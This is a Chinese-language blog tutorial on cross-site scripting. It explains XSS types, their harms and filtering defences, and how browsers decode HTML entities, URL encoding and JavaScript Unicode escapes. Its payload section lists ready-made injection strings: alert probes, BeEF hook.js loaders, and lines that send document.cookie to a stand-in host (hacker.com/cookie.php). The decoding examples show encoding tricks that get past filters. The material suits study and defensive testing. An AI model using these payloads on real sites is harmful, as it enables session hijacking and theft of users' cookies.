当前位置:网站首页>xss漏洞学习
xss漏洞学习
2022-08-01 10:13:00 【miracle-boy】
一、XSS的原理
二、Xss漏洞分类
1. 反射性xss
2.存储型XSS
3.基于DOM的 XSS
三、xss漏洞的危害
四、常见的xss漏洞防御方法
1、过滤JavaScript关键字,过滤onclick、onerror等关键字中的共有部分
2、过滤特定标签,如<svg><script><a><img>等
3、过滤在html中有特殊含义的符号,如'<‘,’>’,”‘”,'”‘等
4、限制用户输入的字符串长度
五、构造xss脚本
1.弹框警告
此脚本实现弹框提示,一般作为漏洞测试或者演示使用,类似SQL注入漏洞测试中的单引号', 一旦此脚本能执行,也就意 味着后端服务器没有对特殊字符做过滤<>/' 这样就可以证明,这个页面位置存在了XSS漏洞。<script>alert('xss')</script><script>alert(document.cookie)</script>
2.页面嵌套
<iframe src=http://www.baidu.com width=300 height=300></iframe><iframe src=http://www.baidu.com width=0 height=0 border=0></iframe>
<script>window.location="http://www.qfedu.com"</script><script>location.href="http://www.baidu.com"</script>
<script src="http://www.qfedu.com/xss.js"></script><script src="http://BeEF_IP:3000/hook.js"></script> #结合BeEF收集用户的cookie
<img src="#" οnerrοr=alert('xss')><img src="javascript:alert('xss');"><img src="http://BeEF_IP:3000/hook.js"></img>
打开新窗口并且采用本地cookie访问目标网页,打开新窗口并且采用本地cookie访问目标网页。<script>window.open("http://www.hacker.com/cookie.php?cookie="+document.cookie)</script><script>document.location="http://www.hacker.com/cookie.php?cookie="+document.cookie</script><script>new Image().src="http://www.hacker.com/cookie.php?cookie="+document.cookie;</script><img src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></img><iframe src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></iframe>
六、浏览器解析编码的顺序
首先是解析HTML实体编码 #,然后URLcode编码%,最后JavaScript中的Unicode编码u
具体规则是咋样的,我们来看具体案例:
1.
<a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29">aaaa</a>
解析时先解析HTML实体编码,没有HTML实体编码,跳过,检测到URLcode,直接将编码给URL模块进行解析,解析结果为javascript:alert(1),但是URL模块并不能解析javascript伪协议,所以不会对alert(1)进行执行
2.
<a href="javascript:%61%6c%65%72%74%28%32%29">解析时先解析HTML实体编码为javascript关键字,后面url解析得到javascript:alert(2),然后执行js,由于是javascript协议,解码完给JS模块处理,于是被执行。
3.
<textarea><script>alert(5)</script></textarea><textarea>是RCDATA元素(RCDATA elements),可以容纳文本和字符引用,注意不能容纳其他元素,HTML解码得到<textarea><script>alert(5)</script></textarea> ,因此可以被解析,但是不会被执行。
4.
<script>\u0061\u006c\u0065\u0072\u0074(\u0031\u0032)</script>这里看似将没毛病,但是这里\u0031\u0032在解码的时候会被解码为字符串12,注意是字符串,不是数字,文字显然是需要引号的,JS执行失败
5.
<div><img src=x onerror=alert(4)></div>这里包含了HTML编码内容,反过来以开发者的角度思考,HTML编码就是为了显示这些特殊字符,而不干扰正常的DOM解析,所以这里面的内容不会变成一个img元素,也不会被执行.从HTML解析机制看,在读取<div>之后进入数据状态,<会被HTML解码,但不会进入标签开始状态,当然也就不会创建img元素,也就不会执行
6.
<button onclick="confirm('7');">Button</button>这里会首先通过实体编码转换成<button οnclick="confirm('7');">Button</button>,从而执行jS的点击事件,所以这样编码也是可以执行的。
7.
<script>alert('14\u000a')</script>\u000a在JavaScript里是换行,就是\n,直接执行
总结:
<script>和<style>数据只能有文本,不会有HTML解码和URL解码操作<textarea>和<title>里会有HTML解码操作,但不会有子元素,所以不会被执行,放弃其他元素数据(如
div)和元素属性数据(如href)中会有HTML解码操作部分属性(如
href)会有URL解码操作,但URL中的协议需为ASCII,不要编码协议JavaScript会对字符串和标识符Unicode解码,所以尽量不要编码一些特殊符号
HTML解析器
HTML解析器是一个状态器,它的初始状态是数据状态(Data State),当文档流进入浏览器时,一直到读取到第一个'<‘,状态转为标签开始状态(Tag Open State),然后进行一个a-z的字符读取,进入标签名状态(Tag Name State),一直到读取到’>’,回到数据状态(Data State)。
html能解析出的5种元素
空元素(Void elements),如<area>, ,<base>等等
原始文本元素(Raw text elements),有<script>和<style>
RCDATA元素(RCDATA elements),有<textarea>和<title>
外部元素(Foreign elements),例如MathML命名空间或者SVG命名空间的元素
基本元素(Normal elements),即除了以上4种元素以外的元素
五类元素的区别如下:
空元素,不能容纳任何内容(因为它们没有闭合标签,没有内容能够放在开始标签和闭合标签中间)。
原始文本元素,可以容纳文本。
RCDATA元素,可以容纳文本和字符引用。
外部元素,可以容纳文本、字符引用、CDATA段、其他元素和注释
基本元素,可以容纳文本、字符引用、其他元素和注释
边栏推荐
- July 31, 2022 -- Take your first steps with C# -- Use arrays and foreach statements in C# to store and iterate through sequences of data
- ClickHouse入门介绍与其特性
- retired paddling
- Generate certificates using KeyStore
- CTFshow,命令执行:web33
- 关于#SQL#的问题,如何解决?
- Taobao commodity details and details on taobao, senior upgrade version of the API
- The use of scrapy crawler framework
- Mini Program Graduation Works WeChat Food Recipes Mini Program Graduation Design Finished Products (2) Mini Program Functions
- Explain / Desc execution plan analysis
猜你喜欢

mysql login in cmd and basic operations of database and table

如何解决 chrome 浏览器标签过多无法查看到标题的情况

Py之yellowbrick:yellowbrick的简介、安装、使用方法之详细攻略

Golang内存分析工具gctrace和pprof实战

Message queue interview latest finishing (2022)

Android Security and Protection Policy

PowerPC技术与市场杂谈

EasyRecovery热门免费数据检测修复软件

C#/VB.NET 将PPT或PPTX转换为图像

Opencv creates a window - cv.namedWindow()
随机推荐
Cross-domain network resource file download
Shell: Conditional test action
解决new Thread().Start导致高并发CPU 100%的问题
How to find out hidden computer software (how to clean up the computer software hidden)
MTK6225-紧急电话
Node's traditional and advanced practices for formatting time (moment)
SkiaSharp 之 WPF 自绘 五环弹动球(案例版)
rpm and yum
7. SAP ABAP OData 服务如何支持 $orderby (排序)操作
开天aPaaS之移动手机号码空号检测【开天aPaaS大作战】
STM32 Personal Notes - Watchdog
Endorsed in 2022 years inventory | product base, science and technology, guangzhou automobile group striding forward
mysql login in cmd and basic operations of database and table
Android 安全与防护策略
Introduction to STM32 development Introduce IIC bus, read and write AT24C02 (EEPROM) (using analog timing)
How to implement deep copy in js?
什么是步进电机?40张图带你了解!
【软件架构模式】MVVM模式和MVC模式区别
Three chess (C language implementation)
How I secured 70,000 ETH and won a 6 million bug bounty